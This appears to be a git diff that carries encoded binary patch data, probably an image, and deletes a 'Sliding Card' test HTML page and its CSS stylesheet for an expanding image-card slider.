zfAZ9P7*dhNL2BYZGm3rYqLh*18UswYd9gKVg7C}`n@-HYdXKRIEBA=)Ua@BvUznM< zZw3%A5ir!k9k`Y-RbS7{w4)22`DJL(Kfh>n+1uwtVw*;OpWF*xAD8he z_s$_|(?3OmhoyZVFzsG{cg$-+=Dq&_2$|k%1I=fJw@i)n5=8u%ANVm3TE2Au`qn$>f5o z!Wld{!FcO2=O)#RVQaz9F2Zo~VlHlAh0M9_dx?1N%77LpDH(lwRbrYHx2&~um6{7~DPyas;R%if zgk%+UEeF1=;$p=L97S-AMJnU1MS$>B8?-W##%e4gT*(bQ8;o+BC6E4S`11U&u`SI2 zqoks<7ZEIK5>ZwzC{9QjM=VVBCRD!AMqEl3HJQul7H`&RQNNfbt*G`LcP1q&q95M> z0EonFN8%Y*8hw+a$SeEjFMJoDtaxp1ed7X*t~{=#DmI@F=2MeG{J)4`1~gyLls59) z-T9YSs5o}e_79n2z3<&e*B|hT>KRd${6?b+zhQ_0=*OexQ9O^d&Ay-ZR=k(?x8^T8 z)7#{Od8>Wjh`RKYh@!^!I|3MNdiyiNj5icplly?oD1aR0nFzabW2Y zjG(G>-_VChR0fFJEzav>_=dt>f4krj@M9Th*wY(0aOMFb`4N`4JF$dPs2s<|A003^ z47)^I^@A_~ZwQPtio7RM65lM5Tj6oFf(z0c+(Qg8nLs10s^QtYxoYLirhHRvNCEGb z0A4R~SzIhROGgn=sv-l@Qxt0B4qQMTWiG+HmE+bR4j0xntGxJV0dWl$R+w0f6K*Ub zO9~MhxT=N~x;Toe+!HAIYL@!-)TW>$w}~G!5pQk|AtZT-t+&*OB_S%M_my6k24YOf zUDLSfy9S6;ImwG~JS5sUEfj8QFaBu3@ET>@FKzcD#Ri}n<%P)1uvJF}ReE8TrPzv{ z@+-TX%iGn4*J~oKJHWW_Q<9>OC>AGpVb9w9L>}MQ<~elrKYp_8uYY*$)IYyS6hKh> z9}?za1%98HWh~ZTtRQPB{g?3`9GpRs`ojFmll7JOheYm*`XkxJU$Xg`UVkUzVgc90 zvT|Sd_=+d@hvrc4hINQldI*3HxbuTC)9_A@-`vZH>-YMD))sw_#HZ^=*?wTZeIUl_ zuk-knYoqn=F_W#H;Q$q-^1l(COc(1st?*)S-!qaR7AEZY#e)#aJ&49y!IPjs5E=Jqt!y9JDYeAu|DS#X?D;}uSCSaH!;%~l{#Lg77Ho`YecCA_Z=vGAPK@8#RCM1Xt0O$ zLIkOk&4BPZVl4(_(KRGQr_ahcAbN8F$N8~;w4qX@Q`Ia40{h!RP&kxyu6AJ++Vcb2hZjC zg>?(>UlDXcSj9Y`?|-<1JLl*6hp@kI?jpduJ;D*ERySSO;tCo|d*7H9xD`5p4_w5i z${QXTkrHO>Wy{&<{pKmWfT7jmBNo=NgF>nUmIOibgDTl}DzS0=#Hy{X*T5yg^>94c zrcWR~vYhHRg+Lpl7;Sh`Evi=p5(XBn%PlslWbkmIMXSUC;=6J{TB{bJajwwem$S%o z1R*Q5m{aQ4ds2<=?EUE|E8`U}4I_b$uq1?hwOVL@|pCh9axAhFESRL8(nlkj4vuhiq(K z7AUE0xn>(MT~T^Kg=y_q020)P17M1hK?+%`(t)pP$TDp7SvkS6{?!bsx9)D!0zP(zH51 zKh(lJkFs69NWRbJCrn?<@hV3_e?+7|^gozefKl|jgoV64gXSVVOZQ~~*3YUXg7foi zrkA=8n4zCFS@JMnxmFd*);AeAS>&xJQqlkRRK#NzH z#DELGOZbz8M*;v2&BbpBGD~)CqFyS~5x5kl_YJc`1DJ=h5tf9#A~Ds5C!|@S12Eu2 zr8%n(iHLBUg8()_7O9^`Ftf3Gl{T7Z6L7@6;pr2drk_MvVU1f|ONg*XZUDe)Qk{gW zrx5P~w=CmP*jBSWR;6`^T8IG2xOJhoGU-fPGA3?Ng5|HQ81F2h4plI*aIRFLmRD5( 
zS+YHP!o)FG83TeFQG~mWh$6;gHk*#ETn-6vRicB>7l1?s!bIW{=y^qTwlrEt=7$kd zbt_WEmo5UT7%J4Vyg;@~t-&u?w*LU>66H*De@gDxEQ;xf+p%-EA9RL* zlwP1=l=2AjdFS3al-!<_$t$>nTs8+E7das`6i$sTThLA~1F#_WtHUY>(;X2(K@L^A6Uz`DVZ!qQAer zC+pkuGKYVc@d|fW$M+mcb5FD46vbipKXiqKxi8dyVc<(g-1s5Yp~uJf2Btsgd`swM zKIg=vM#^{D{KY|#2gnl`+^~##0iv?4eKjtitzLb61}misI;2PN9jh?ir$~%u@Jy!t ze4<=c2M`Y=R28+Eji3&$-=wBgH9}vFrHN%micwb%_P(JF?-5%da<{)IL3$Xd$N=Wz zo+Ysm1%_%Z6l{kWftBeIn3*!w1&odrnjVh~%ok4j#3a_4jjlVrOJQpix}aP#Ll?M{ zRGh(L#B#2ZhY52XK!O(Qq%;n?L1-?HBa|t=BY@&@0b6yOnI4iAorPc1Z5PJJ=-%j- z5G2Rwlr9+}&FB)OVKgXRqY+6#X&l{+!&e|kHL~47YL7Lb-D|YxwbXRZujn(# z{Skb?F>B(>s3-R|E$y7XAv80quF&C*EfEV~1pCNsf&i3ja*7#$0oa;%V392QYS2u0Y zP$;&-+9;%#Gj%Cs6^A)t#)ZgIs*V=HYt(UD-CwdKJIg~vZTQVl(VHiJWuRBy za_8!!Eu`)2tHoKN`-Xc(wLYaH`3yMf1R173|LrS8^5FgXO6Yb2#S#WryXWl$o_z1Qj^RDN8?4r_7AbpkJY* zG}QyzcT$g(=#z*iX6qGlD>gi0tR%#s3|hJKc$aUnLE|bBA_UjFhV`!XzJ}~i?Y+j; z^KO}s4Lk#}PLcfcHY8R#>pg2y3{BPb^0~3-_rIX(6htUWfeKGzvr&L41O0%tjkj(6 z5?u*fvnj=PS%+{XFF{XkV9)MLZ#kHEO`2q(oNyw8zVIitUvY=@lA_FL#N0DKB>!(d z%!ZY&+-qIQ?8BmGcOzdj%m#KJP5EOKBCv`tpL;zaBVJgVv+A1+;(T=bQ@pCV3YH~) zDA~P74+eD~2ozKWeCDIl>U+1$+nV=%TZ^md?ugI_zo4!)us{ASu)Tm6EYp&n-SVk5 zl3ddkrWpEMmy7x7_FQDx^j@8(1S#IVuNJ0Q8X+=on#KcBDv2F`@AXSb%SG)0iC(>Hv-9z9xzrwofD1j$3FVt7>&dF1c*-Is; z21%p`I)2?gBTcz~s9qa<_cQ4s)`%qx);s-|>p0DYgv1u!w+l$DmiS zLIlbslhlgAhd{<3aTIlF&x~E0+>E7*5%@IALMjeeTUuSd3X{MHHcY(den7W~29T+G zho(H2MPDN(2xsrz>&WmYRf{DObh9MtC}F9PZ}Bp>fCude9M{Ksx}DB)Xc{>yW|<#v zq;S(I&#PuLQxk;VtMbh>hOfg?#lU}Av3&&oUbYgb>iG%9QEZ>e%yc+ngZs#HlOO&M z@Y^?#ZFWK9mtd;`{}Nr3dDo2q~{Jy$I zJ*M$m(RVa(=>B0a!w{txmO;zOK>tDIGjhkHG@)1C0UMRSggFrv`r_bBwkCHlj_PSn z&9~KFi!O@4UOR^TRz=*RL+*Bomm;n(EReyql+xYnDfQ_sGWpa|YF;O4jK{NIy=O-y z3Quib7s6k8hMSP_D{sc1r#GdSbB;oyUb*vjkx5fb_46z=piH=z45V8FdwTQvu<;UXAt-*X412GWk!pKD_+Xy&T8iKTV@?qV_2~Yb=)8SP-Qq7a1X^m?~kBq2zj&+m(Ro5ky&766>Gq4 zg85IMwxeFY=>5F2{-3d;FddR!fs5FM%w>;oODCg&iaF~MY{={Wl;ZPw-|WDI2??hY z8X|qy@gLHcScWnVDY#8h$D#PDbG~i;mD)RS3~`s6j(v7T*L=U)H&G%mhfPYLQx2&s 
zYFp$W*AgWgXYS-~-!~D;rT14q8@5d(EhUq0AkB_#p|MGOSuz$YyVCsMsvfk0Z3cVK z7Gk@4z@xE9?NI@l$k63&r6`*Xlp;;nX89`t-dcuV5y+)3b!>b8O-<=Grf2>K@ckH> zm@o9Ya-dDzdmlp`C?#T0LnB`ZQ25;7`Ne_C7eKF=f?&b~9Q4Sa-BpVo_m-@w94)|l zREOY31!!Cesp@^4+=U}G<>g&@Kh-Va39G5b+QMbh9sasZ@N$nF>Je6qj-LOIbY1;6 zDH_@Nz7+g`vj4oNq8a>1akFN~7ZQ7oOoRX2DlWJ1n^TOjR{4Pv&WhnK@K$;75Zi-k zYCC>0tbe=0<;g~6p`{K_Ca0(7oADbvd>rt#Q*xLetmHyl{zze3@;xb~>G@xe|w07cbkK8dL@-b{DcT2z?Rze$0N45!inDppSzhcE) zOrClm+3M-8CdP$wdkW}=(e+4hnvtEEiH64Fn12leh(!lkkp$n~j3~&LGZ{_u9x^iD zCR5~Lm#@AG4n9davoCaTuY+C^Yory>HOG^cSIro00*KYME-YJct7Ve zXELt>MP?p_|Z@}g#H(nvDms&~F^gJbW?;^f*^(eAz{In=I-7SCp zDtVhi(B}2kog;i*^(WfAWbsyHn}GDy!4TN$+g}a0Pxja1cvi;dbMz>$U-a5`fEKOo z%|!BH_!H871I<@o`Y&V6laFtu-l_U+6Te-ftM-ki```OL?;G8n3a|w;gMyoy+5eU3cH>z!n$+CCo~m0VAKdpwD7j~5CP*sqtPsmrik{^{}vl9s>*`$L)4mEZs;rt8rShZW z6T8x~*wDxruN5AL;t1)W&7M;z{!WPRCNj3ZFTc*Sg2E4c(Wm>S+LpeW%*8qhhT_2n zBNyAIQf$Xx zubn-?;{DV)*%j`Ijjqoi6F!3|1CW|e0&n{REBIyJqEhU8PbYo-^rz%{cToBq&tF7R z=cGD5*Tf;h9s*Y8Ic4nG~58aGKMa^q{4qTZ5 z+cwnpWt~jnB`~O(<1!p34sU^3FhV<;`V)@AF{PwPw+!|45&8_DUNzl9!|q^lac}Kn z^SHikBMI@D%T%75x?Rl%;~ zr?s7~%>jchsoUlBM){LFvIlT(8f*!zI(1wNJLXdb_Q3NutX zvh6Y9!J5>fVha)F?3tSeQ3;u8=;uzx`Zne=oW{aV!Gx{pnsj~X_^YU)fq1IC96~Yn zVsxfaK5j3&)dyD|OpL_Ge#v4aKP`avkF`AmMK#O6=8Ir0{sE4t2&$eTQfI=rW?>I; zKUxDBpIa@2)1F z96pMn4D2MsC+G0NNw@D;q6$c#b?R(j{N9gtMf=)f($-1oylB72d_<2KM-QdIY+)bM zBM-2vU`d8ra>;2HOu*`qPjZp_w?dZI@Hl~U z4*A})AWWGqlCccyY-N<4uBPowBg5)n-&2oT;2ttVd&;)X%k>PZ-rSqcG!EPc#xO?c zpV8{^{)hEdGH5_?u`syxU24^;T2|Svc*DOFGhwYtRp`7HWoLnXK__|Z^Xh&^=^wND zFbf=k%O?K&<0x6#p-_A{#5sk14&S{>u z5EHLQw|>KjA2M8UxvaZ6jS5WX#NDN7sx^sr2(G7(eXi1bD<^)j(gSs3(J)Iav12J| zs#h#1F-JRJAUT_m{1Z+MiN&aR0UPWSwL{_b6*_M-efV7UI*5hyv6w7{--eh7sTOM6EvK!vWnCv0{i)Dda1JW*Z;k@R&y6|Bw_m)#Jk*m(3Sbh! 
z_Kyge3TEvH7kyG&&fjV3xQM+<=ccs~ELqMRCtK`w+=q~-SUy!|a^`hrkrJ&Te;tFy zeqnN_YS4aa`6xCb&DN}4`lr${lfQ4!X+GfMJ?*2U)cpQ}30&c3gVSsBpg!e|1wN1E zzX+ibwYJOFk5O~O#hwqt#RZXFmTy)hl0KYh)&L?_f4-7}CmMbA9}26w&-4Z++wmQtxq*qa_eBb6C#uFwtdn9*dJ{SF+M3cAT;Y+6z}TO|Kb-B2z1 z$?;0BzvBf(pd^2o8`EBS)@+ZT0r!_#nliATftw`cYa{G^&arnMg!93}kl}@=EhUa@ z{Ga~;C|>GNJS=1LboX@JvB^KxzrEIYz7b#a9Lx6_tDnluQk|u(Td(j&vqkeDE^;GI z@!iZd*iq^qz!4aAc3JQ`4WdHahxEA8XXkJByy$K41O@R4f5-PaKOctQ?nrI+mxP&5 zIGY{_R7Jh?a4s6>FN6H=+M!n>r9&?J86BELU!xi8mmL zzoq;N%_vgubHz(@_dd?0Oj{Y#I0mn*=Wu@IR=MiA++)vFIV0S|RXzI~>BkBU&r3nR z_-`=S7j7|DnWe}0X81Skb;Rp@vet!J*NXDTA9tJh?ez2wjq_f}fnr}poZ)1P-oq^W z84Dzz1?&bD75)}l<#he>K(Jcrjgv7_w|-9=e!Yu$Pxd%IcT`u8-i+{1+fu(l6-iz4 z>A})HcsfJIgNrQoBNnK037UHs8iM;^T*?WURDWg+h9Zz=PS4>^yN*C{zF+_%&<}FW@Sr`_ReYLu4v@ z%PYLnnZ{9VOJ}DKjdiJ{F>%%{yE86Qn(wDTFvy3 zaGUyd+Ig+9y!bx(qeUst@**)<0IaPHX-Fb|U9{1%KKl$At6#IPYS7NQD*31vAJ<4QQ(LK^dz_5(?eY(EHI|?4$JCgqT z#l2;U8kJ)u*TnER>7N)?y~l)~zA;pv^5xBPADJVI4_d~xFoIp7&GMNajN2sJGT%7% z7o|${wGTv0u5W#XPX1{SZIn3wBV^+xHb4x{*nI zd(YW5tuVEBrU11fXbEpfr7J9JXFeg5;N)lQ8N$l*Zf+g}{6_w&LN%J<*9Q4YnQo7Q z*PYv}`cgg^kdmxZQ#2=B#&dW514NcnxZwTKi<~hfnDiN)Pxs!1v1SCH6z)2H4L?@} z@i%%Mw7xQzGS6e7tWT~*fXsanlA}Mv&Vt8;+rCpDLPsKtof6FFD|bXmBdY=@a7BUc z;ph;*a(THv`yVpNj|^{lBIi(PyMrH^og^QwQ;uh5nYmGyQ<boCSaTN=VDn_pS|>^=0@1@15}O2!CfxImaB#HHsIm zNw8;WMV=G)v|BPhH^-=s*i%KHOC}R3remj!%--Zh&Et>ohCp zF{8auyRF|`SuV${RtP31DN{M&oD_e_Zv50ZMDu#66@?FKNKrhJAV+55@VZ_}2-{j#>rOuFxx`(G>+?)`n zRN-BmgpU%~z;vT5VmkY`TJ0P^+c&+K;P*hjFhQb==ZHc-YFO=eh6uV1!}%ne^p_kw zdrKWH%gvPrdZDsMMtw>J+0OY-0DtjJf!=?bee?ED+ZTdNl-z&1@z^PE9KA=;CgHgL z#N`1;9zK>#m$dq|?)pk8c97dzo(Fk#(^mYwxXoQEnGU6Oc>R{PZZ1Qvzl ztgA&@1s7$uP5a^XlRzV4j-M`2zD&GfiO4^I45k1=b)a2`kl4w{b*iX%Sq2MnlG6SM zVE+f`$%Osn8epi{WcCE%beM@L4oe@!$v1|mO8)8CHhJ`1HjcNjhSJz?WWlV~gQ8JK z&GPWJxbP021!y^|yKR-WbchYzK==CVmv6HOo#l%@e6CID87g=|rv1bL-Lqt6(h5-= z4Q`1wRz!&8ONrgLSqlUh9Xum4#uJyc00(GHV&JH(r;W#nA*#<&%(H!(37VqUz3fV{ z`uf>b@tsLMB66UN`}GHK>kCe}P&e=rx^o)yD6uyF^{?|R>)fZ^#`S;DgR6)an#9br 
zr}2Fu^B-I9BXhWNowAw(B(uj@4V3=caHxggiaJ|BI}^Ot6kusI|eM2k)r<4!mp`{UbVV3v+kB2O7s}JSn+3 zGv9mn6r@av#}mHJbKq2Bq7lRq?uRUy=#O>}ghh+=HK>+vU0ZV<2&L2v#!_aBFJpE6 zlFxxFOt(wNM9$HZF|Og-Ce7aUrB86C;zT#0j)vTY`q(fbZRW=r7yI=bcA4|fC!UmiGC zw*AeNiT^HH3HjxCIn`)z*;65}vAgG+k^is|rf=NE8J_wr6V$a@&(st_)h-bfq~L6g z*>zzVew$psY*kGA0#AWt4>nuqZKmCa%lN6Z5}_&c?d0=h7$~28@uoD=`X=$@WMGhy z;HkO3<>(tvu`Ke&C6@rK;PBLqPD`VLf(sT~G2aSwBDEyanrZ~EP=uuR{{s+X@HRa7 zZ{Bu@@`!~~K<8;%^apOWLhXCEzehV=i*Y>CRxv&I3N4FsX%FFvHpS|hF5+V>U>f}- zb~5zj{ppt}mK;%+un5Tez3YUs2y}N$rU2X`CwBg3Sb;`mhVZRt2M4Oi4aa|`Da_ht%1f^r{T`LHZf$&k!H2_;hf(;Io20#0Y@%Bgj;AIcSid!<=;Y%^Q-S}02Ziobp z_>|4Nn9(nOAT^cjFAwH|coq_N-qu(w00^!37E)qQ^*w;t&RnU29R_|%r%>ZpJdK5U z|M8T2jtAR(?A`-hHN%BxeVTzG$8RukIn=gfe^<2ZSPyo|+}1oIY#hdn-qTv`10Wv=YSk0YA9y*C&uB-uKIjD>rn53G3QXA7;-ObIi({4xjFnP!M|D0PKmdB zM?S)k9Y@NJ6J{p?I6NYaAz;F>aVlcOFnbWQdG1V0kYxp`R>A(f?$CdHNl0XM%a(xM zH}j$6m%3*rSN6E?gfze+Lj#lPmarYGHZr(*B41L^pWJXCI_KXM^e7)*h=SCI2&D$# zJ6gTM6k$6|lYv~wFuMEA>r%i0 zMs37Dz#5oFg6w-yiRymdq521yp82EuD<<>Tm!ukDg)VsWugS%B5veFX{H0r1 zTw0gu;$Wj~maK)Uc$&Zo%CP4?2-nico56!~nt}-kG(>q6Z2n_}ZF>gn}y^(aS*K}Vzap8Z6%IVDr1J7QAz zQo@gVyX2k88S)b}%w&Q&@yPMK^W0vuyO5Z(awWBX9O^&UI2MU0jLcOL?I9O=s&mN@ zLIkm<+Mq_=3?7dZ-zO5}_L?$T+qoA=c%=LGTofOST?xx&7K=uVutbcn5AE9HK(s^d zjVBPXG~OxQcTliwej<2Ei1U=yCGA5#CMvU4<$t z^$>&^bmeaeK8Y1njzrcjy55ZUMu|TP;+76}StRH-bd&&ALXSGB#w-~ysNp7F5zvZ! 
z+(zd(H{qkf5lLY5ya68A?T^(xd}K*D%|^YnTEoMs1`y1B7v1r~n2C?0xnb%bKmxKg z^nRTX)G&K2IBm(~!%%&e7Aka)UMOuUa9B~JK0%$)fO|=KB_IJ0gbGXRo!#i#(a_&# zdAQ}PcY6J+leA>ImLBnTYx|U;N+do z5}*Ms4z(7XE7>l1%5?um z>qGEm%zyCPYuH@(_1%^&m0E7uRP1#?r|gT?G{t-F6r((Ahrl}oul{?kFGcgf>nJ$JaueQF)tnbkj-s-1UF8<#Y0H_m*S$XCth-j3Utz7wzGiz; zNtY`;@K0#3g$8l?BDqyUu1eku^rsP@^t&eF-S6I+6lHu^%l-0UtGAHDOal+RUh5N& zl3S*0JW&W=&~sM0EeQr@&Y5 z=m?#)rW2~>HTZM1H5skqEnYj;lg8kZNB%c~BpzpB8eJ5O-y+8NkaX7CS?-CKnP$n$ z^Bx|nWCu#Q5wuY(5J>|GHj<#VaklXijQvBzA`mmX*f+z4#A-F#FyBqR-|?FV(3~yT zVW%CYY;T5~UAwWr8Rg#>(gJVxZiZXAt@}RYf^ydk+-fn~!q~6O%jD#}{yL#7)-nL` zMK>i~lg4wGb$sJNMf|75&8*gm2&8tjG9P_Gna7|_5FS&}ZYm7h@D$eTTr|m}yH+OZ z4R|9U%feuPm$RVL7vlC*6(M|eGv#cLAnxgU90vTA`8R$`zU8qHvs4z^`1#11i0@9ia)Os{FBT~^XDRsOtXeMLLnP=AVu!RMiTJ>YwUSBe0N_#|N3uZIm z#)z}Ytk#%+kbqGO@%`TIie>bAmt2Jr8;l;YElkIfpE7Md5u9YJohtC9s&Y(*dYqMH z5NPp4eAU*udvxo|dQxa^>XVz;XEZ~48p#Jv^j~m<$xtBEMr?`^K+NS~n`&e^Thk!# zxVh^656jVA4$R0665fMmEJ|^6nVM{gR1 zAUvo}W2TA}%}k2phuZ0U#U!1OlrMTs+w$_OrJu#-(kXGgj0uV>Zp8GI$&Rig8%FY@ z2``sUXz>m$wk*vkP91>vMp8ABmJuX0-!<<>6Oc|=IC(Kk_xhJGbixd!ZDzjFjDMc$ zcp_zYZF}w9PMVXd=WS9^ZmxoAtPT47k7xfYMq;C*QNNd0Oq@r<^(nX;xW#Ak(w^PH zy3e|7Ir;GmrKfSJx41x|*Iy?DhrHv|MtVFZmiul#;f8*m3uZE2AjQ6)a87?Q6ASv2 znaH~(#aaz!Ci(y@TDGT1N}!T$@i(3mac1;|ZplGJ(gZ)ACQB-sxo3M-O;156CPR*b zKQht%0kwS&`<_c6Rcf8)XF1Kki*oPz)Q`cNsfgXrn}sDTI#s!8uPo|myFdiiL<+RM@H6XR)z@pPy4tR26+H~ z5_rLkY);+xU2frH7ellH1_u7s8;6MsK%^}A~zgNhEE%*AldA6wXaan(=z0sYRY(< z-7cG#ye-d^8;i=bDkOgc;rG3DZYz)R>(Hjaqo|E^zol*6n|9)fhzPT@$?7xn;&Yc76zw+TM z?Y|RNn$JbqsAeSIVam{Xo&!7I8vaQ&Vq8dPy$$|I?M+1|*m=FI!DI>fv0#pf+&_^> z4S+`ak|4A`-Ib-&19`SsZ0#Le9OGgYpUCmza6(93zN#_qbn8N03p*{ZKm8AK zJQW;8B!| zbk&P+>q45w7T%Z1N7}7^cuva|Q?h6agaA?+O5uY;(wnAxEe?!w&QRFv zyYo!;+uG8lZ4T;xfIzCd`Gy#M^33dS?c`G;QjjujU8;(y#_{_^xv5G;7i3}y#cDxV zwCJdvRZ>NzTt0PKtCRjAs74)F|AmWb*IGOLD7}@Us4#xeiILGrSn<7j0aG*1NL*UK zh~jj%jKo-bH|tyMrjhH#An=iDN%!SD)d;p6?E70ldQ~q{QCD?!Ge7cn8`0y2B?Y0pTlU&R zR2cgQWQcI6Iw2hkLRe~3}bP?f` 
z7S(@{m@*!YkaUgq&!y)qm+rwo2?*r#6Yo|mO8YX0?DR|@oJ-LjdbnP%+R~n?QQ(&+ zfIRcVEw<~Q+vWw6_Onj#wZj2Zj$y!j%{-f7i%&bjxQNMmC6h_5{s0r-g_5$cR@gBAp;C_ai9jbr?-fc^IKDMIrJ;iliWmx9|btzT|!4 z@S))&vR$Zc(5D-R<3cYqi%-S~WsA=q1cAcc@{Ub$agR=@-iTrD0U``=_TiaJqXWL= z^Tc`TG6i81BJl<$KY74`!uGEKi4^-PM>!auCM*@n|84Nl(MF!Mi%&O=bK!26*Qlkv zpBVOBWrG)oS@JzbCrYqUa|}?3s*^pW6uP{0X$^`t;?<> zaXBj>IooUw;yGe@DP@STPiOp0t`zB`xy(uY4@^k%t>D$o7DORIPR5b-WmxTpuD=B* zb}2S1mDmu>5U;HRfir%NnY>=l>3YiQS1g&O!g1kC{V4hmT&eoFu1JxW#Zki!YQbBP z<~-K;Id3YBCT|rV^iAKmbWTs7cB66Wcv0xJ-M#uS;)TBIa}2;IdF9*;nD)$3Kf4vR}|qo6Frb% zm0UQN4-qGn!?I-QuhOI45pFWdr1mc5l^5%@l|L5#Lp08sLDNqI{&bT;FCXzX=!DvO&DAMd00~6>KYXvt>(Nsqn(p`_E{Da_6UYvO>DsU^9fn-zI@I5V z5pGI&SeOe42xZS(mFq>IwvwanlZ~WrQ)Co+;Eg7-L=8si0elro(HWR5j|7`E85aEc z{+^}wN5^Z%>O(_ zb{i46C=9TL%{3n|U6+j(fWFT2==43@Oysy=M^J2;Hi8@hsk!{j8yzeENesG*k!zBx zDWK}~5r{yk)rW~fHkKp=XbtOuEp;UfyRXbBlTiJChHx#wdZwVAX3L~UNE3XUdLwmx zO^Odz>uTq;PKgruugC(3oaYqXsO_R3FdTk4qow;KB_F{eMy@VBp5%5xdl`IWTc1>d zttPxjKkj_EF+_~Nh3GDrITCt}CnC918!q)_iz+v~rPc-Rn_vTp9Ki@e31hS2r}NVy zj?EHqW&$bbB$r(U1qDB1(X|(z3*2jfk&cuRm1$7%c^OgH(Rt7Th7=xun#$i8b$_hp zKd?pgI`fsuI|OHIx>SW-Fx^(xAhDZAZ(Pq3jsOAT4!Caxz z_@U#{Vcz%@mmBiQcW9Bb=tZ+Hoj+oZKMN6!3lSM=G=2Z;R>nclJ zwUnkMH;$;Clz7EcX=MxmTBKDF2#Xm`;!bbCa~rj`K(cn^bgfaf!^+h4OO4*bmR3!m z%jlLCODY92vmJRrAqyrK;tuqGGya0LP8iT4p;EONqBHtIoqsz}vX!()R15AIS0~Am zCfa4IN!-9IFEmE3)5RJG=P7EU#tHEkg7r!Clhw5Se-y|L23^6rs=v_A$*TG1DX5O5 z_s5f}V(&J8@XRgWK27CqLKFj3V| z^_3xidyAWqBjdS8($uc8Kmn{jArh?hq*jBCV=O$VI^004gE=258Ho1DnfGCE4Cn<{ zUE=XMZx2rekid8;PLw?GJ!dDgP-Z)W+@hjxT%s+zD^{-t$nl9B^$A?`xJwLgqG3oY z6!?t*Z{P4PP6;AT$z82qSVuq+tI{@q=8QZ#Tjc4mLOwQs+%97N4FG!{vmv;3@NAF7 z?_pGd?6&9&U+O&0e*nIbBY~G#C%nBs)8f z0l)?iS)IBCU5#I)%ZZ-F3C^Q?4>XUbx{xCUV4XCmlY^jL0(TRM5JRu?;kp zjsrcci7g0Zp0aOpkpd=-hLh3O{un9z2cXP4;ak@vav{?k=)4p72Z;OqUJt)KOw-y= zBdevRf7*K#9T$^7EOeRRE@9H9bnNgLUJri>t!UV_k(-hWw1k7NUjpz?6FYK18=2UM?g{bLp%CKztbk_^w zG4e-R>wQHM=w8;>bKlIMJV@<1PET^qVig2aTE!M<%)37~q-eR44=s||E<}E`BCHtt z+6^b2vu%~$$%Pht097~8lFbDMO`li;OUe 
z5s#uRy3oQL*hhsj`cbnJz2UwN^3`U<-sz|{1I-&ooF5tuAHr?mPK)uyIu%6(Gt%qL zO4^jB>m1Qhrb(^``3m|z-KN&|QFHQQW$$}~?$lKV#OAmP!i@`MSS!Y1(n8(;QDeRBx_qfAeuaX^7_ z*IZJ@q>&Q~jH=#@1N zx+4*(G~&penMdN(;|Wc@LN7)-*R10QrP@>h=_7pwcs#Vjp_{XAqA$a``X8VznZ^m2 z5nlz8;eZ9D)D?2hvpzmy?&!G;FIX>^AXJY5Fw#mrZ8dDANQXhTWb`GH8!DWk_z9-hx^m00G*fTu0S>ixv5MVC{U@>MKkSKXM}%-YJw}Hkz(A?Tqj|N&SNv80k=X zDZCy(jHZbCLe%q`8UOr}bAeF`ju}dkBZh-gkVV?g0^p`*W0g@cg@P(R*8N9{j2s7vmCDWVi!a1-B zu%y@s!BBkRI!+4tUWitZiHVO0h=p=RV7RI6MmnLPiau_ugi2eZPO@9fb!Cdo0%G4D zu2F7mET%p6H~(?l$A~>JiGdM9w6Xy{Y{73q*l>u-rfR3FbuZ>YjE0TTng+`#m~@Tv zpV7>|44IUiozd6QE@$%BYL}>_cM>qrm}4BS;4R^=8+T%stimy^%uClP95F~2zTH(`!L5qQ41|QeS@*KCRt(r pLS{W`WI&>P8liG8OH%f^viJ=j2mXZdIV3L_C!gGjEJpwP_CGzZWM}{Y diff --git a/test/SlidesIndex.html b/test/SlidesIndex.html deleted file mode 100644 index 174bed2..0000000 --- a/test/SlidesIndex.html +++ /dev/null @@ -1,64 +0,0 @@ - - - - - - Sliding Card - - -
    -
    - - - - - - - - - - -
    -
    - - \ No newline at end of file
diff --git a/test/styles.css b/test/styles.css
deleted file mode 100644
index 44bd14d..0000000
--- a/test/styles.css
+++ /dev/null
@@ -1,107 +0,0 @@
-* {
- box-sizing: border-box;
- margin: 0;
- padding: 0;
- font-family: "Poppins", sans-serif;
-}
-
-body {
- background: #c582ff;
-}
-
-.wrapper {
- width: 100%;
- height: 100vh;
- display: flex;
- align-items: center;
- justify-content: center;
-}
-
-.container {
- height: 400px;
- display: flex;
- flex-wrap: nowrap;
- justify-content: start;
-}
-
-.card {
- width: 80px;
- border-radius: 0.75rem;
- background-size: cover;
- cursor: pointer;
- overflow: hidden;
- border-radius: 2rem;
- margin: 0 10px;
- display: flex;
- align-items: flex-end;
- transition: 0.6s cubic-bezier(.28, -0.03, 0, 0.99);
- box-shadow: 0 10px 30px -5px rgba(0, 0, 0, 0.8);
-}
-
-.card > .row {
- color: white;
- display: flex;
- flex-wrap: nowrap;
-}
-
-.card > .row > .icons {
- background: rgb(74, 74, 74);
- color: rgb(255, 255, 255);
- display: flex;
- border-radius: 50%;
- width: 50px;
- justify-content: center;
- align-items: center;
- margin: 15px;
-}
-
-.card > .row .description {
- display: flex;
- justify-content: center;
- flex-direction: column;
- overflow: hidden;
- height: 80px;
- width: 520px;
- opacity: 0;
- transform: translateY(30px);
- transition-delay: 0.3s;
- transition: all 0.3s ease;
-}
-
-.description p {
- color: #ffffff;
- padding-top: 5px;
-}
-
-.description h4 {
- text-transform: uppercase;
-}
-
-input {
- display: none;
-}
-
-input:checked + label {
- width: 600px;
-}
-
-input:checked + label .description {
- opacity: 1 !important;
- transform: translateY(0) !important;
-}
-
-.card[for="c1"] {
- background-image: url('1.JPG');
-}
-.card[for="c2"] {
- background-image: url('2.JPG');
-}
-.card[for="c3"] {
- background-image: url('5.JPG');
-}
-.card[for="c4"] {
- background-image: url('4.JPG');
-}
-.card[for="c5"] {
- background-image: url('6.JPG');
-}
\ No newline at end of file